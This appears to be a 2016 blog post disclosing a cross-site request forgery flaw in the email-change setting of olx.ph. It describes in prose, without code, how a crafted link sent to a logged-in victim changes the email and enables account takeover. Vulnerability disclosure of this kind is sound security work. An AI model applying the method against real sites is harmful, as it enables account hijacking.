Wednesday, September 28, 2016

Cross-Site Request Forgery change Email in https://www.olx.ph

Hi there,
while testing http://www.olx.ph came across a CSRF vulnerability in the setting menus.

Reproduction Steps :

choose victim who already logged olx.ph account. An attacker send link (payload change email ready to execute when the victim click that link) to victim.When victim click that link, the email already change, and attacker can verify with his email.

Exploitability :

Since attacker publish this vulnerability, this vulnerability could affect all users. After that it can be use to attack the other user. attacker can take over user's account.

Impact :

An account can be take over by attacker.




Posted by at 0 comments
Labels: , , , , , , , ,
Subscribe to: Posts (Atom)